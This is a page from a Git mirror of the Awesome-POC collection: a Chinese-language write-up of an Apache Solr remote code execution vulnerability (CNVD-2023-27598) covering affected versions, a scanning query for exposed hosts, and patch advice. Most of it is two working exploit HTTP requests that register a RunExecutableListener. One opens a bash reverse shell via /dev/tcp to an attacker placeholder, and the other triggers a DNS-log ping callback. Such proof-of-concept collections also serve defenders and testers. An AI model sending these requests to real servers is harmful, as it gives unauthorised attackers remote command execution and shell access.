admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 03:44:10 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web服务器漏洞/Apache Solr 代码执行漏洞 CNVD-2023-27598.md
Threekiii 772a085cfa 更新漏洞
2023-08-28 15:55:36 +08:00

48 lines
1.5 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Apache Solr 代码执行漏洞 CNVD-2023-27598
## 漏洞描述
Solr 以 Solrcloud 模式启动且可出网时,未经身份验证的远程攻击者可以通过发送特制的数据包进行利用,最终在目标系统上远程执行任意代码。
## 漏洞影响
```
8.10.0 <= Apache Solr < 9.2.0
```
## 网络测绘
```
app="APACHE-Solr"
```
## 漏洞复现
使用postCommit来命令执行
```
POST /solr/demo/config HTTP/1.1
Host: 192.168.1.92:8983
Content-Length: 180
Content-Type: application/json
{"add-listener":{"event":"postCommit","name":"suiyi","class":"solr.RunExecutableListener","exe":"bash","dir":"/bin/","args":["-c", "bash -i >& /dev/tcp/your-ip/9999 0>&1"]}}
```
通过newSearcher命令执行
```
POST /solr/demo/config HTTP/1.1
Host: 192.168.1.92:8983
Content-Length: 170
Content-Type: application/json
{"add-listener":{"event":"newSearcher","name":"newSearcher3","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "ping -c 3 your-dnslog.dnslog.cn"]}}
```
## 漏洞修复
1. 如果未使用 ConfigSets API请禁用 UPLOAD 命令将系统属性configset.upload.enabled 设置为 false 详细参考https://lucene.apache.org/solr/guide/8_6/configsets-api.html
2. 使用身份验证/授权详细参考https://lucene.apache.org/solr/guide/8_6/authentication-and-authorization-plugins.html
3. 官方已发布漏洞补丁及修复版本,请评估业务是否受影响后,酌情升级至安全版本:
https://github.com/apache/solr/releases/tag/releases/solr/9.2.0
Reference in New Issue View Git Blame Copy Permalink